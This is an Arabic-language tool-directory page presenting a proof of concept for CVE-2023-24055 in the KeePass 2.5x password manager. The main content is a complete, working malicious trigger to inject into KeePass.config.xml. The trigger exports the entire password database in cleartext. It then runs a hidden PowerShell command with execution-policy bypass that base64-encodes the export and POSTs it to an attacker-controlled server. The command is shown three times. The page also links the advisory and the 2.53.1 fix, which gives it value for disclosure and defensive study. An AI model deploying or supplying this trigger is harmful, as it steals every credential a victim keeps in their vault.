Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-24055_PoC — إثبات المفهوم لـ CVE-2023-24055 (KeePass 2.5x) | Kitploit
أدوات/GitHubGitHub/alt3kx/cve-2023-24055_poc
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالتسريب البياناتما بعد الاستغلالالفريق الأحمر
GitHubalt3kx/cve-2023-24055_poc

CVE-2023-24055_PoC

إثبات المفهوم لـ CVE-2023-24055 (KeePass 2.5x)

عرض المستودع
2533747منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2023-24055 إثبات المفهوم (KeePass 2.5x)

قيد النقاش والتحليل...

https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/
https://sourceforge.net/p/keepass/feature-requests/2773/

يمكن للمهاجم الذي يملك صلاحية الكتابة على ملف إعدادات KeePass تعديله وحقن مشغلات (Triggers) خبيثة، على سبيل المثال للحصول على كلمات المرور بالنص الصريح عن طريق إضافة مشغل تصدير.

https://nvd.nist.gov/vuln/detail/CVE-2023-24055
https://www.cve.org/CVERecord?id=CVE-2023-24055

إثبات المفهوم المبكر لدي (KeePass 2.5x)

(1) يمكن للمهاجم الذي يملك صلاحية الكتابة على ملف إعدادات KeePass KeePass.config.xml حقن المشغل التالي، على سبيل المثال:

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<TriggerCollection xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<Triggers>
		<Trigger>
			<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
			<Name>exploit</Name>
			<Events>
				<Event>
					<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
					<Parameters>
						<Parameter>0</Parameter>
						<Parameter />
					</Parameters>
				</Event>
			</Events>
			<Conditions />
			<Actions>
				<Action>
					<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
					<Parameters>
						<Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter>
						<Parameter>KeePass XML (2.x)</Parameter>
						<Parameter />
						<Parameter />
					</Parameters>
				</Action>
				<Action>
					<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
					<Parameters>
						<Parameter>PowerShell.exe</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter>
						<Parameter>False</Parameter>
						<Parameter>1</Parameter>
						<Parameter />
					</Parameters>
				</Action>
			</Actions>
		</Trigger>
	</Triggers>
</TriggerCollection>

(2) سيفتح الضحية KeePass كجزء من نشاطه المعتاد، ويحفظ التغييرات، وما إلى ذلك... سيتم تنفيذ المشغل في الخلفية لتسريب بيانات الاعتماد إلى خادم المهاجم.

تفاصيل مشغل إثبات المفهوم

أ) سيصدّر المشغل قاعدة بيانات KeePass بتنسيق KeePass XML (2.x) format متضمنًا جميع بيانات الاعتماد (cleartext) إلى المسار التالي، على سبيل المثال:

root@kitploit:~
c:\Users\John\AppData\Local\Temp\exploit.xml 

ب) بمجرد تصدير الملف، يمكن تعريف إجراء ثانٍ لتسريب بيانات XML باستخدام Powershell.exe وترميزها إلى base64 على سبيل المثال:

root@kitploit:~
PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))

ج) سيتم تسريب البيانات إلى خادم الويب الخاص بالمهاجم على سبيل المثال:

1

قيم مشغل إثبات المفهوم

root@kitploit:~
Name: Trigger
Events: Saved database file | [Equals]
Conditions: <empty>
Actions: 

(1) Export active database 
File/URL: c:\Users\John\AppData\Local\Temp\exploit.xml
File/Format:  KeePass XML (2.x)

(2) Execute command line / URL
File/URL: PowerShell.exe
Arguments: -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))
Window style: Hidden

بيانات الاعتماد...

root@kitploit:~
PS C:\Users\John\AppData\Local\Temp> type .\exploit.xml  | Select-String -Pattern Password

2

3

أمثلة عامة على المشغلات:

https://keepass.info/help/kb/trigger_examples.html

الإصلاح الصادر : التغييرات من 2.53 إلى 2.53.1:

https://keepass.info/news/n230109_2.53.html

root@kitploit:~
Removed the 'Export - No Key Repeat' application policy flag; KeePass now always asks for the current master key when trying to export data.

قراءات إضافية

(*) ماذا يعني CVE الخاص بـ KeePass هذا للمؤسسات التي تبحث عن خزائن كلمات مرور جديدة (Carlos Perez)

https://www.trustedsec.com/blog/what-this-keepass-cve-means-for-organizations-searching-for-new-password-vaults/
https://www.youtube.com/watch?v=OEaFaSjaZY4

(*) KeePass تعترض على تقرير عن ثغرة قد تسرّب قاعدة بيانات (Steve Zurier)

https://www.scmagazine.com/analysis/identity-and-access/keepass-disputes-report-of-flaw-that-could-exfiltrate-a-database

(*) Security Weekly News (06:56 KeePass)

https://www.youtube.com/watch?v=iz0PsYlH8Ig

(*) KeePass 2.53.1, une nouvelle version qui corrige « la vulnérabilité » CVE-2023-24055 (IT Connect FR)

https://www.it-connect.fr/keepass-2-53-1-une-nouvelle-version-qui-corrige-la-vulnerabilite/
https://www.it-connect.fr/faille-critique-dans-keepass-un-attaquant-peut-exporter-les-mots-de-passe-en-clair/

(*) أدوات

https://github.com/deetl/CVE-2023-24055
https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
https://github.com/Orange-Cyberdefense/KeePwn

المؤلف

Alex Hernandez المعروف أيضًا باسم (@_alt3kx_)

تنزيل الأداة